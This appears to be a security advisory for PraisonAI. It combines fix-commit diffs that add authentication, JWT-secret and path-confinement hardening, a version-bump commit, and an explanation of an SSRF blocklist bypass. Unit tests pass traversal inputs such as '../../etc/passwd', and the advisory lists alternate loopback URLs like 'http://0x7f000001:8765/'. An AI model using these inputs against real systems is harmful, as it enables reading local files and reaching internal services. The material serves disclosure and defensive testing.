status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can remove an owner", + ) removed = await member_svc.remove(workspace_id, user_id) if not removed: raise HTTPException(status_code=404, detail="Member not found")
src/praisonai-platform/praisonai_platform/services/auth_service.py+4 −0 modified@@ -113,6 +113,10 @@ async def login(self, email: str, password: str) -> Optional[tuple[User, str]]: def _issue_token(self, user: User) -> str: """Issue a JWT for a user.""" + if JWT_SECRET == _DEFAULT_SECRET and os.environ.get("PLATFORM_ENV", "dev") != "dev": + raise RuntimeError( + "Refusing to issue JWT with default PLATFORM_JWT_SECRET outside dev" + ) now = datetime.now(timezone.utc) payload = { "sub": user.id,
src/praisonai-platform/tests/test_workspace_rbac.py+18 −0 added@@ -0,0 +1,18 @@ +"""Workspace member RBAC and cross-workspace IDOR guards.""" + +from __future__ import annotations + +import pytest +from fastapi import HTTPException + +from praisonai_platform.api.deps import ensure_resource_in_workspace + + +def test_ensure_resource_in_workspace_rejects_mismatch(): + with pytest.raises(HTTPException) as exc: + ensure_resource_in_workspace("ws-a", "ws-b", label="Issue") + assert exc.value.status_code == 404 + + +def test_ensure_resource_in_workspace_allows_match(): + ensure_resource_in_workspace("ws-a", "ws-a", label="Issue")
src/praisonai/praisonai/api/agent_invoke.py+14 −2 modified@@ -29,14 +29,26 @@ # Authentication import os CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN') +_CALL_AUTH_DISABLED = os.getenv('PRAISONAI_CALL_AUTH', '').lower() == 'disabled' + async def verify_token( request: Request, authorization: Optional[str] = Header(None) ) -> None: """Verify API token for authentication.""" - if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN: - return # No authentication if FastAPI unavailable or no token set + if not FASTAPI_AVAILABLE: + return + if _CALL_AUTH_DISABLED: + return + if not CALL_SERVER_TOKEN: + raise HTTPException( + status_code=503, + detail=( + "CALL_SERVER_TOKEN is not configured. Set CALL_SERVER_TOKEN or " + "PRAISONAI_CALL_AUTH=disabled to run without authentication." + ), + ) token = None
src/praisonai/praisonai/code/tools/write_file.py+10 −11 modified@@ -58,9 +58,10 @@ def write_file( >>> if result['success']: ... print(f"Wrote to {result['path']}") """ - # Resolve path - if workspace and not os.path.isabs(path): - abs_path = os.path.abspath(os.path.join(workspace, path)) + # Resolve path — default workspace is cwd so relative paths cannot escape + effective_workspace = workspace or os.getcwd() + if not os.path.isabs(path): + abs_path = os.path.abspath(os.path.join(effective_workspace, path)) else: abs_path = os.path.abspath(path) @@ -73,14 +74,12 @@ def write_file( 'path': path, } - # Security check - ensure path is within workspace if specified - if workspace: - if not is_path_within_directory(abs_path, workspace): - return { - 'success': False, - 'error': f"Path '{path}' is outside the workspace", - 'path': path, - } + if not is_path_within_directory(abs_path, effective_workspace): + return { + 'success': False, + 'error': f"Path '{path}' is outside the workspace", + 'path': path, + } # Process content processed_content = content
src/praisonai/praisonai/mcp_server/adapters/cli_tools.py +33 −5 modified
@@ -21,6 +21,31 @@
 logger = logging.getLogger(__name__)


+def _resolve_cwd_yaml_path(file_path: str) -> "Path":
+    """Resolve a YAML path strictly inside the current working directory."""
+    from pathlib import Path
+
+    if not isinstance(file_path, str) or not file_path:
+        raise ValueError("file_path must be a non-empty string")
+    if (
+        "/" in file_path
+        or "\\" in file_path
+        or "\x00" in file_path
+        or file_path.startswith(".")
+        or file_path in ("..", ".")
+    ):
+        raise ValueError(f"invalid file_path: {file_path!r}")
+    if not file_path.endswith((".yaml", ".yml")):
+        raise ValueError("file_path must be a .yaml or .yml file")
+    base = Path.cwd().resolve()
+    candidate = (base / file_path).resolve()
+    try:
+        candidate.relative_to(base)
+    except ValueError as exc:
+        raise ValueError(f"invalid file_path: {file_path!r}") from exc
+    return candidate
+
+
 def register_cli_tools() -> None:
     """Register CLI-based MCP tools."""

@@ -44,7 +69,8 @@ def workflow_validate(file_path: str) -> str:
         """Validate a workflow YAML file."""
         try:
             import yaml
-            with open(file_path, 'r') as f:
+            yaml_path = _resolve_cwd_yaml_path(file_path)
+            with open(yaml_path, 'r') as f:
                 config = yaml.safe_load(f)

             required = ["framework", "topic"]
@@ -64,9 +90,10 @@ def workflow_validate(file_path: str) -> str:
     def workflow_show(file_path: str) -> str:
         """Show workflow configuration."""
         try:
-            with open(file_path, 'r') as f:
-                content = f.read()
-            return content
+            yaml_path = _resolve_cwd_yaml_path(file_path)
+            return yaml_path.read_text()
+        except ValueError as e:
+            return f"Error: {e}"
         except FileNotFoundError:
             return f"File not found: {file_path}"
         except Exception as e:
@@ -417,7 +444,8 @@ def deploy_validate(config_path: str = "deploy.yaml") -> str:
         """Validate deployment configuration."""
         try:
             import yaml
-            with open(config_path, 'r') as f:
+            yaml_path = _resolve_cwd_yaml_path(config_path)
+            with open(yaml_path, 'r') as f:
                 config = yaml.safe_load(f)

             required = ["name", "type"]
src/praisonai/tests/unit/code/test_write_file_workspace.py +23 −0 added
@@ -0,0 +1,23 @@
+"""write_file must constrain paths when workspace is omitted."""
+
+from __future__ import annotations
+
+import os
+
+from praisonai.code.tools.write_file import write_file
+
+
+def test_write_file_without_workspace_stays_in_cwd(tmp_path, monkeypatch):
+    monkeypatch.chdir(tmp_path)
+    ok = write_file("out.txt", "hello", workspace=None)
+    assert ok["success"] is True
+    assert (tmp_path / "out.txt").read_text() == "hello"
+
+
+def test_write_file_without_workspace_blocks_escape(tmp_path, monkeypatch):
+    project = tmp_path / "project"
+    project.mkdir()
+    monkeypatch.chdir(project)
+    result = write_file("../outside.txt", "nope", workspace=None)
+    assert result["success"] is False
+    assert "outside" in result["error"].lower()
src/praisonai/tests/unit/mcp_server/test_cli_tools_path_hardening.py +21 −0 added
@@ -0,0 +1,21 @@
+"""MCP CLI tools must not read arbitrary filesystem paths."""
+
+from __future__ import annotations
+
+import pytest
+
+
+def test_resolve_cwd_yaml_rejects_traversal(tmp_path, monkeypatch):
+    monkeypatch.chdir(tmp_path)
+    from praisonai.mcp_server.adapters import cli_tools
+
+    (tmp_path / "workflow.yaml").write_text("framework: test\ntopic: t\n")
+
+    path = cli_tools._resolve_cwd_yaml_path("workflow.yaml")
+    assert path.name == "workflow.yaml"
+
+    with pytest.raises(ValueError):
+        cli_tools._resolve_cwd_yaml_path("../../etc/passwd")
+
+    with pytest.raises(ValueError):
+        cli_tools._resolve_cwd_yaml_path("/etc/passwd")
src/praisonai/tests/unit/test_call_server_auth.py +40 −0 added
@@ -0,0 +1,40 @@
+"""Call server agent API must not fail open without CALL_SERVER_TOKEN."""
+
+from __future__ import annotations
+
+import importlib
+import os
+
+import pytest
+
+pytest.importorskip("fastapi")
+
+
+@pytest.mark.asyncio
+async def test_verify_token_requires_token_by_default(monkeypatch):
+    monkeypatch.delenv("CALL_SERVER_TOKEN", raising=False)
+    monkeypatch.delenv("PRAISONAI_CALL_AUTH", raising=False)
+
+    mod = importlib.import_module("praisonai.api.agent_invoke")
+    importlib.reload(mod)
+
+    class _Req:
+        query_params = {}
+
+    with pytest.raises(Exception) as exc:
+        await mod.verify_token(_Req(), authorization=None)
+    assert "CALL_SERVER_TOKEN" in str(exc.value)
+
+
+@pytest.mark.asyncio
+async def test_verify_token_optout(monkeypatch):
+    monkeypatch.delenv("CALL_SERVER_TOKEN", raising=False)
+    monkeypatch.setenv("PRAISONAI_CALL_AUTH", "disabled")
+
+    mod = importlib.import_module("praisonai.api.agent_invoke")
+    importlib.reload(mod)
+
+    class _Req:
+        query_params = {}
+
+    await mod.verify_token(_Req(), authorization=None)
a72e156c4d01 Release v4.6.40
12 files changed · +13 −13
docker/Dockerfile.chat +1 −1 modified
@@ -16,7 +16,7 @@ RUN mkdir -p /root/.praison
 # Install Python packages (using latest versions)
 RUN pip install --no-cache-dir \
     praisonai_tools \
-    "praisonai>=4.6.39" \
+    "praisonai>=4.6.40" \
     "praisonai[chat]" \
     "embedchain[github,youtube]"
docker/Dockerfile.dev +1 −1 modified
@@ -20,7 +20,7 @@ RUN mkdir -p /root/.praison
 # Install Python packages (using latest versions)
 RUN pip install --no-cache-dir \
     praisonai_tools \
-    "praisonai>=4.6.39" \
+    "praisonai>=4.6.40" \
     "praisonai[ui]" \
     "praisonai[chat]" \
     "praisonai[realtime]" \
docker/Dockerfile.ui +1 −1 modified
@@ -16,7 +16,7 @@ RUN mkdir -p /root/.praison
 # Install Python packages (using latest versions)
 RUN pip install --no-cache-dir \
     praisonai_tools \
-    "praisonai>=4.6.39" \
+    "praisonai>=4.6.40" \
     "praisonai[ui]" \
     "praisonai[crewai]"
src/praisonai-agents/pyproject.toml +1 −1 modified
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "praisonaiagents"
-version = "1.6.39"
+version = "1.6.40"
 description = "Praison AI agents for completing complex tasks with Self Reflection Agents"
 readme = "README.md"
 requires-python = ">=3.10"
src/praisonai-agents/uv.lock +1 −1 modified
@@ -2992,7 +2992,7 @@ wheels = [
 [[package]]
 name = "praisonaiagents"
-version = "1.6.39"
+version = "1.6.40"
 source = { editable = "." }
 dependencies = [
     { name = "aiohttp" },
src/praisonai-platform/pyproject.toml +1 −1 modified
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "praisonai-platform"
-version = "0.1.2"
+version = "0.1.4"
 description = "Platform layer for PraisonAI — workspace, auth, issues, projects"
 readme = "README.md"
 requires-python = ">=3.10"
src/praisonai-platform/uv.lock +1 −1 modified
@@ -1208,7 +1208,7 @@ wheels = [
 [[package]]
 name = "praisonai-platform"
-version = "0.1.2"
+version = "0.1.4"
 source = { editable = "." }
 dependencies = [
     { name = "aiosqlite" },
src/praisonai/praisonai/deploy.py +1 −1 modified
@@ -57,7 +57,7 @@ def create_dockerfile(self):
             file.write("FROM python:3.11-slim\n")
             file.write("WORKDIR /app\n")
             file.write("COPY . .\n")
-            file.write("RUN pip install flask praisonai==4.6.39 gunicorn markdown\n")
+            file.write("RUN pip install flask praisonai==4.6.40 gunicorn markdown\n")
             file.write("EXPOSE 8080\n")
             file.write('CMD ["gunicorn", "-b", "0.0.0.0:8080", "api:app"]\n')
src/praisonai/praisonai.rb +2 −2 modified
@@ -3,8 +3,8 @@ class Praisonai < Formula
   desc "AI tools for various AI applications"
   homepage "https://github.com/MervinPraison/PraisonAI"
-  url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.39.tar.gz"
-  sha256 `curl -sL https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.39.tar.gz | shasum -a 256`.split.first
+  url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.40.tar.gz"
+  sha256 `curl -sL https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.40.tar.gz | shasum -a 256`.split.first
   license "MIT"

   depends_on "python@3.11"
src/praisonai/praisonai/version.py +1 −1 modified
@@ -1 +1 @@
-__version__ = "4.6.39"
\ No newline at end of file
+__version__ = "4.6.40"
\ No newline at end of file
src/praisonai/pyproject.toml +1 −1 modified
@@ -12,7 +12,7 @@ dependencies = [
     "rich>=13.7",
     "markdown>=3.5",
     "pyparsing>=3.0.0",
-    "praisonaiagents>=1.6.39",
+    "praisonaiagents>=1.6.40",
     "python-dotenv>=0.19.0",
     "litellm>=1.83.14,<2",
     "PyYAML>=6.0",
src/praisonai/uv.lock +1 −1 modified
@@ -4841,7 +4841,7 @@ wheels = [
 [[package]]
 name = "praisonaiagents"
-version = "1.6.39"
+version = "1.6.40"
 source = { directory = "../praisonai-agents" }
 dependencies = [
     { name = "aiohttp" },
Vulnerability mechanics
Root cause
"Missing hostname normalization and IP resolution in URL validation allows alternate loopback encodings to bypass the blocklist."
Attack vector
An attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` can bypass the weak blocklist by using alternate loopback encodings such as `http://127.1:8765/`, `http://0x7f000001:8765/`, or `http://localhost.:8765/`. These forms pass the string-based validation but are interpreted as loopback addresses by the HTTP client, reaching local-only services. [ref_id=1] [ref_id=2]
Affected code
The vulnerability resides in `praisonaiagents/tools/spider_tools.py` within the `_validate_url` method. The validation only blocks exact host strings like `localhost` and `127.0.0.1`, failing to normalize hostnames or parse numeric IPv4 variants before the request is made via `requests.Session.get()`. [ref_id=1] [ref_id=2]
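To make the failure mode concrete, here is a minimal sketch of an exact-match host check. It is an illustrative stand-in, not the project's actual `_validate_url` code; the names `NAIVE_BLOCKED_HOSTS` and `naive_is_allowed` are hypothetical. It shows that the canonical loopback spelling is rejected while every alternate encoding listed in the advisory is accepted.

```python
from urllib.parse import urlsplit

# Hypothetical exact-match blocklist, assumed for illustration only.
NAIVE_BLOCKED_HOSTS = {"localhost", "127.0.0.1"}


def naive_is_allowed(url: str) -> bool:
    """Return True when the URL's host is not an exact blocklist entry."""
    host = urlsplit(url).hostname or ""
    return host not in NAIVE_BLOCKED_HOSTS


# Alternate loopback encodings taken from the advisory text.
bypass_urls = [
    "http://localhost.:8765/",
    "http://127.1:8765/",
    "http://0177.0.0.1:8765/",
    "http://0x7f000001:8765/",
    "http://2130706433:8765/",
]

if __name__ == "__main__":
    print("http://127.0.0.1:8765/", naive_is_allowed("http://127.0.0.1:8765/"))
    for url in bypass_urls:
        print(url, naive_is_allowed(url))
```

Because the comparison is on the raw host string, any spelling the blocklist author did not anticipate passes, even though the networking stack may later map it to 127.0.0.1.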
What the fix does
The patch replaces the weak exact-string blocklist in `_validate_url` with a new `_host_is_blocked()` function that normalizes the hostname (lowercasing, stripping trailing dots), resolves numeric IPv4 variants (decimal, hex, octal, and shorthand like `127.1`), and checks the resolved IP against `ipaddress` properties for loopback, private, reserved, and link-local ranges. It also blocks well-known metadata endpoints and internal DNS suffixes. [patch_id=3131099]
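The normalization steps described above can be sketched roughly as follows. This is not the patch's `_host_is_blocked()` implementation, which is not reproduced in this section; the helper names (`_parse_part`, `parse_legacy_ipv4`, `host_is_blocked_sketch`) are hypothetical. The sketch assumes `inet_aton`-style parsing rules for numeric hosts and leaves out the metadata-endpoint list, internal DNS suffixes, and any DNS resolution.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit


def _parse_part(part: str) -> Optional[int]:
    """Parse one component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part.lower().startswith("0x"):
        digits, base = part[2:], 16
    elif len(part) > 1 and part.startswith("0"):
        digits, base = part[1:], 8
    else:
        digits, base = part, 10
    allowed = "0123456789abcdef"[:base]
    if not digits or any(c not in allowed for c in digits.lower()):
        return None
    return int(digits, base)


def parse_legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Interpret 1 to 4 dotted numeric parts the way inet_aton-style parsers do."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(v > 0xFF for v in leading):
        return None
    if last >= 1 << (8 * (4 - len(leading))):
        return None
    number = last
    for index, value in enumerate(leading):
        number |= value << (8 * (3 - index))
    return ipaddress.IPv4Address(number)


def host_is_blocked_sketch(url: str) -> bool:
    """Return True for loopback, private, reserved, or link-local targets."""
    # Normalize: lowercase and strip trailing dots ("localhost." -> "localhost").
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if not host or host == "localhost" or host.endswith(".localhost"):
        return True
    address = parse_legacy_ipv4(host)
    if address is None:
        try:
            address = ipaddress.ip_address(host)  # also covers IPv6 literals
        except ValueError:
            # A DNS name: this sketch does not resolve it, a real check should.
            return False
    return (
        address.is_loopback
        or address.is_private
        or address.is_reserved
        or address.is_link_local
    )


if __name__ == "__main__":
    for candidate in ("http://127.1:8765/", "http://0x7f000001:8765/",
                      "http://localhost.:8765/", "https://example.com/"):
        print(candidate, host_is_blocked_sketch(candidate))
```

Checking properties of the parsed address rather than comparing strings means new spellings of the same address do not need their own blocklist entries. A hostname that resolves to a loopback address through DNS would still pass this sketch, which is why validating the resolved IP matters as well.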
Preconditions
- input: The attacker must be able to supply URLs to the `spider_tools` functions (`scrape_page`, `crawl`, `extract_text`).
- config: A loopback-only HTTP service must be listening on the target host/port.
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References